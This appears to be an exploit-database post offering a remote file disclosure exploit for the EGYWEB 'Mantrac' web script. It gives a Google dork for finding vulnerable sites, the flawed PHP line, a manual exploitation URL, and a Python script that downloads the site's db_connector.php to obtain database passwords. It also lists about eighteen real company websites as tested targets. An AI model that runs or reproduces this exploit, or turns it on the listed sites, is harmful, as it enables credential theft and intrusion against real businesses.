EGYWEB (Mantrac) <= Remote File Disclosure Exploit



EKU-ID: 4238 CVE: OSVDB-ID:
Author: KnocKout Published: 2014-09-15 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


EGYWEB (Mantrac) <= Remote File Disclosure Exploit (.py)
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact (onlymail) : knockout@e-mail.com.tr
[~] (.py) Exploit Coded by : B3mB4m
[~] HomePage : http://Cyber-Warrior.Org - http://h4x0resec.blogspot.com
[~] Special Thankz: 1337day.com
############################################################
                 Turkey Security Group
                 'h4x0re SECURITY'                        
###########################################################
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : EGYWEB
|~Affected Version : Mantrac Script
|~Software  : www.egyweb.com
|~RISK : Medium
|~Google Keyword/Dork :  "Created by EGYWEB"   |    "EGYWEB" inurl:index.php?pg=     |  inurl:360download.php
|~Tested On : [L] Kali Linux \ Mozilla Firefox \ Arora \ [R) ALL example sites.
####################INFO################################
database passwords can be drawn.
  
### Error Line in '360download.php' ##
  
..
..
$file_name=$_REQUEST['file_name'];
        download($file_name);
  
?>
  
########################################################
  
Example and tested on;
  
http://www.deltagroup.com.eg
http://www.mantracvostok.ru
http://www.mantracghana.com
http://www.mantracnigeria.com
http://www.mantrackenya.com
http://www.mantractanzania.com
http://www.unatrac.com
http://www.iratrac.com
http://www.iratrac.iq
http://www.unatrac.com
http://www.mantracvostok.com
http://www.mantrac-sl.com
http://www.mantracuganda.com
http://www.mantracegypt.com
http://www.quest.com.eg
http://www.delta-ghana.com
http://www.delta-tanzania.com
http://www.pyramidscapital.com/eng/
  
############################################################
 Manual Exploitation; http://$VICTIM/360download.php?filename=[LOCAL FILE]
############################################################
=========Automatic "db_connector.php" File Disclosure Exploit ========
##################### exploit.py in ##############################
  
import urllib
  
  
def master():
        print """
        ########################################################
  
                 EGYWEB <= Remote File Disclosure Vulnerability (.py)
                 Automatic "db_connector.php" File Disclosure Exploit
                 Researched by KnocKout           
                 Exploit Coded by B3mB4m 
                 Website: http://h4x0resec.blogspot.com / h4x0re Security
                 ============
                 How to use :
                                python exploit.py
                                Target : http://VICTIM.com
                                Target : http://VICTIM.com/path
                                        That's it !  Happy END !
  
        #################################################
        """
  
class KnocKout:
        def __init__(self):
                self.ask = raw_input("Target : ")
        def exploit(self):      
                self.rename = self.ask.replace("http://", "") + ".php"
                try:
                        urllib.urlretrieve(self.ask+"/360download.php?file_name=classes/db_connector.php", self.rename)
                        print "Finish ! Config --> %s "  % (self.rename)
                except:
                        print "This website have a security sorry ! ";
  
if __name__ == '__main__':
        master()        
        op = KnocKout() 
        op.exploit()